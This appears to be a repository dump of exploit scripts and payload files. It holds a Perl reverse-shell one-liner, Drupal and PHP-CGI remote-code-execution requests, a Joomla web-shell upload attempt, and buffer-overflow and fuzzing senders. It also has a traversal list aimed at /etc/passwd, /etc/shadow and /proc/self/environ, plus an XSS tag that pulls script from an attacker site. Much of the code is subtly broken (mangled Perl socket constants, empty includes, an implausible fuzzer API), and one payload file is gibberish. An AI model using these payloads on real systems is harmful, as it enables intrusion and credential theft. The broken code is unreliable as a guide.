AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -------------------------------------------------------------------------------- /drupal_exec.sh: -------------------------------------------------------------------------------- 1 | perl -e 'use Socket;$i="TARGET_IP";$p=PORT;socket(S,PFINET,SOCKSTREAM,getprotobyname("tcp"));if(connect(S,sockaddrin($p,inetaton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}; 2 | -------------------------------------------------------------------------------- /drupal_rce.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use LWP::UserAgent; 4 | 5 | $target = "http://target.com/admin"; 6 | $payload = "?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=id"; 7 | 8 | $ua = LWP::UserAgent->new; 9 | $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"); 10 | 11 | $response = $ua->get($target.$payload); 12 | 13 | if ($response->is_success) { 14 | print $response->decoded_content; 15 | } else { 16 | print $response->status_line; 17 | } 18 | -------------------------------------------------------------------------------- /execve_code.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(int argc, char *argv[]) 6 | { 7 | char *args[] = {"/bin/sh", "-c", "id", NULL}; 8 | execve(args[0], args, NULL); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /exploit_mod_session.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | int main(int argc, char * argv[]) { 9 | int sockfd; 10 | struct sockaddr_in server_addr; 11 | 12 | if (argc != 3) { 13 | printf("Usage: %s [IP] [PORT]\n", argv[0]); 14 | exit(1); 15 | } 16 | // Create socket and connect to server 17 | sockfd = socket(AF_INET, SOCK_STREAM, 0); 18 | memset( & server_addr, 0, sizeof(server_addr)); 19 | server_addr.sin_family = AF_INET; 20 | server_addr.sin_port = htons(atoi(argv[2])); 21 | inet_pton(AF_INET, argv[1], & server_addr.sin_addr); 22 | connect(sockfd, (struct sockaddr * ) & server_addr, sizeof(server_addr)); 23 | char request[] = "GET / HTTP/1.1\r\nHost: localhost\r\nCookie: SESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nConnection: close\r\nContent-Length: 0\r\n\r\n"; 24 | send(sockfd, request, strlen(request), 0); 25 | close(sockfd); 26 | return 0; 27 | } -------------------------------------------------------------------------------- /fastcgi_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | target = "http://localhost:8088/cgi-bin/webui/admin/tools/app_ping/diag_ping/" 4 | headers = { 5 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 6 | } 7 | payload = "?-d+allow_url_include=on+-d+auto_prepend_file=php://input" 8 | data = "" 9 | url = target + payload 10 | r = requests.post(url, data=data, headers=headers) 11 | if r.status_code == 200: 12 | print("Successfully Exec Command") 13 | -------------------------------------------------------------------------------- /fs.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | binary="/usr/bin/grep" 3 | vulninput="%x.%x.%x.%x.%x.%x" 4 | 5 | gdb -q $binary << EOF 6 | run <<< "$vulninput" 7 | EOF 8 | -------------------------------------------------------------------------------- /joomla_rce.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use LWP::UserAgent; 4 | 5 | my $target = "http://www.example.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"; 6 | 7 | my $ua = LWP::UserAgent->new; 8 | $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"); 9 | 10 | my $exploit = $target . "&file[0]=shell.php&file[1]=''"; 11 | 12 | my $response = $ua->get($exploit); 13 | if ($response->is_success){ 14 | print "Exploit sent successfully\n"; 15 | } 16 | else { 17 | print "Exploit failed\n"; 18 | } -------------------------------------------------------------------------------- /kitty_fuzz.py: -------------------------------------------------------------------------------- 1 | from kitty.model import * 2 | from kitty.interfaces.web import WebInterface 3 | 4 | sess = Session( 5 | web_interface=WebInterface(host='127.0.0.1', port=8080), 6 | fuzz_data_collector=DataCollector() 7 | ) 8 | 9 | target = Target(name='Fuzzing Target', process='httpd', session=sess) 10 | model = BufferOverflow(name='Buffer Overflow', target=target, size=1024) 11 | 12 | sess.connect(sess.web_interface) 13 | sess.fuzz(model) -------------------------------------------------------------------------------- /mini_ecex.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | target_host = "127.0.0.1" 4 | cmd = "ping -c 4 " + target_host 5 | os.system(cmd) 6 | -------------------------------------------------------------------------------- /msrpc_fuzz.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | int main(int argc, char *argv[]) { 9 | 10 | int sockfd; 11 | struct sockaddr_in target; 12 | 13 | if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { 14 | perror("socket"); 15 | exit(1); 16 | } 17 | 18 | memset(&target, 0, sizeof(target)); 19 | target.sin_family = AF_INET; 20 | if (inet_aton(argv[1], &target.sin_addr) == 0) { 21 | perror("inet_aton"); 22 | exit(1); 23 | } 24 | 25 | target.sin_port = htons(135); 26 | if (connect(sockfd, (struct sockaddr *)&target, sizeof(target)) == -1) { 27 | perror("connect"); 28 | exit(1); 29 | 30 | } 31 | 32 | printf("Connected to %s\n", inet_ntoa(target.sin_addr)); 33 | char buf[1024]; 34 | memset(&buf, 'A', 1024); 35 | send(sockfd, buf, 1024, 0); 36 | close(sockfd); 37 | return 0; 38 | } -------------------------------------------------------------------------------- /payload.txt: -------------------------------------------------------------------------------- 1 | /%# (#/ #, ( , % , %%&/(&% /%,~~(..,,,,,,./.(/(/(..................................//.../.....)))))))))))))))/......))))).))))###///////////////:::::-...//++++++++////")),,,,,,,,,,,,,,,,,,,,-.-..-.%%%%%%%%%%HJKLKLIKHHIOOOOOOOOFFFFEEEE$.%%%%%%%%%%%%%%HHHHHHHHHKKJJKKLKSSSOOOOOORRRRQQQQQQWWWXXXXLLLLLLInnnnniiiiiyooooooooFFFf3DCACCDDDpmwlammlOOOMM@@@@UUVVVVXXZZzzxZXZZBBBB@TTTTTTT@@WJJAASSjjSAASsASswwwwXXXrrrrrfffFFFGGGGgggGIIIIAAzzZYYY###############$$$UUUUTTTT>>><<<>>><<<>>>>iilllLLLLfffff$$$$ppPPPP;;;;;;;66877766666666666666666666666666666666666666666666666666666665444444444444445555555555666PPPPP\\\\\\\\\\](()^^^^^^^^^))2222222244444444333333333333344555555999999988888999999uuuuuuuuuuuuuuuuu[[[[[[EEEEEEE00000AAAAAAAAaanndndndnndnnnnccccccxxxxxxxoooobbbbb%%PPPXXXXXYZTTTTaaaaabbbvvkkkeeeeettrrr???????????????………………………………………………………………………………………………………..................–––––―—–—¯¯¯¯.--.—.-.–.--.—.--.–.--.–…-.————®©¥§¶¥©€™•¡¬😊¢@£{}"😊£tØâßßßØû„‰Â^êÉ Fo¨–—| |طظΩ∆Σƒ∂đΠœäçñ\ıō•?'îøùóôœúœæðéáüôåï)*㉔=>°º╲●○◆❃ ◈ ⁂ 🐰 🐋 🎎 ♠️ ♣️ ♥️ ❤️ ❀ ⚑ ☼𝕊𝕖𝕧𝕖𝕟 •♪♫♬🌏☁️⛅️🍃 ©´❤️☀️✈️〰️▓█░▐░███████░░███░░▐░▌ ░י■𐌀𐌗𐌏𐌔𐌉𐌗u})})[[]:hiuhvucoueufue8732456789987655633333ggghhhhhhhhhhhhhhhhhhhjjjfjjgdfhjklsdkflskdjfkljsdlfksedlisolskldksodfloieidjonpwoecdizeissoonweiwewoi;2kka;kquapiq2wiq5wr46er48erpeifncodneiwme0e9lslpiscokpdkeiledkenomdxcpodcipcd 2 | -------------------------------------------------------------------------------- /payloads_sample.txt: -------------------------------------------------------------------------------- 1 | ../../../../etc/passwd 2 | ../../../../etc/shadow 3 | ../../../../etc/hosts 4 | ../../../../*.conf 5 | ../../../*.conf 6 | ../../*.conf 7 | ./*.conf 8 | /var/log/*.* 9 | /var/logs/*.* 10 | /var/www/*.* 11 | /var/www/**/*.* 12 | /usr/local/**/*.* 13 | /usr/.htaccess 14 | /usr/.htpasswd 15 | /usr/.htgroup 16 | /*~*~*~*~*~*~*/** 17 | /*~*~*~*/** 18 | /*~*/** 19 | /*~~*/** 20 | /*~~*/**/** 21 | %0A 22 | %00 23 | //etc//passwd 24 | //etc//shadow 25 | //etc//hosts 26 | //bin//sh 27 | //bin//bash 28 | %00*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.* 29 | ../../../../etc/passwd 30 | ../../../../etc/shadow 31 | ../../../../boot.ini 32 | ../../../windows/win.ini 33 | ../../../windows/system32/cmd.exe 34 | ../../../*.* 35 | %2Fetc%2Fpasswd 36 | %2Fetc%2Fshadow 37 | %25%30%41 38 | %252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd 39 | %252e%252e%252f%252e%252e%252fetc/shadow 40 | /cgi-bin/test-cgi 41 | /cgi-bin/id 42 | /cgi-bin/* 43 | /cgi-bin/*.* 44 | /cgi-bin/*?* 45 | /cgi-bin/*&* 46 | /cgi-bin/*=* 47 | /*~* 48 | /*$* 49 | /*!* 50 | /*#* 51 | /cgi-bin/ 52 | /phpmyadmin/ 53 | /admin/ 54 | /login/ 55 | /config/ 56 | /mysql/ 57 | /wp-admin/ 58 | /webdav/ 59 | /server-status/ 60 | /scripts/ 61 | /*~1*/.asp 62 | /*~1*/.aspx 63 | /*~1*/.cfm 64 | /*~1*/.cgi 65 | /*~1*/.pl 66 | /*~1*/admin.* 67 | /*~1*/login.* 68 | /*~1*/logon.* 69 | /*~1*/manager.* 70 | /*~1*/secret.* 71 | /cgi-sys/ 72 | /cgi-exe/ 73 | /cgi-perl/ 74 | /cgi-shl/ 75 | /scripts/ 76 | /scripts/admin/ 77 | /scripts/root/ 78 | /scripts/user/ 79 | /*~root/*~user/*~admin/*~bin/*~sys/*~perl/*~shl* 80 | /*.*.*.*.*.*.*.* 81 | /*..*..*..*..*..* 82 | /*...*...*...*...* 83 | /*....*....*....* 84 | /*.....*/.....*/ 85 | /*......*/......*/ 86 | /*.......*/.......*/ 87 | %2e%2e%2f%2e%2e%2f 88 | %252e%252e%252f%252e%252e%252f 89 | %c0%ae%c0%ae%c0%af 90 | ..%2f..%2f..%2f..%2fetc%2fpasswd 91 | ..%2f..%2f..%2f..%2fetc%2fshadow 92 | ..%252F..%252F..%252F..%252Fetc%252Fpasswd 93 | ..//../../../etc/passwd 94 | /cgi-bin/*?*=*&*=*&*=*&*=*&*=*&*=*&*=*&**/*?**/*?**/*?**/*?**/*?**/*?**/*?**/*?**/*?**/*?**/*?**/*? 95 | /cgi-bin/php 96 | /cgi-bin/php5 97 | /cgi-bin/perl 98 | /cgi-bin/python 99 | /cgi-bin/bash 100 | /cgi-bin/sh 101 | /cgi-bin/cmd 102 | /scripts/*.* 103 | /*~*.* 104 | /*~* 105 | /*.*~* 106 | /*.*~ 107 | /*.*/* 108 | /*.*/*~* 109 | /*.*/*~ 110 | */*.*/* 111 | */*.*/*~* 112 | */*.*/*~ 113 | *;*/;*/;*/;*/;*/;*/;*/;*/;*/;*/;* 114 | /proc/self/environ 115 | %0a%0d%0a%0d%0a 116 | %25%30%41%25%30%44%25%30%41%25%30%44 117 | %3Cscript+src=http://attacker_site/evil_script.js+type=text/javascript+language=javascript+charset=utf-8+defer> 118 | %3Csvg+onload=alert(document.domain)> 119 | 120 | 121 |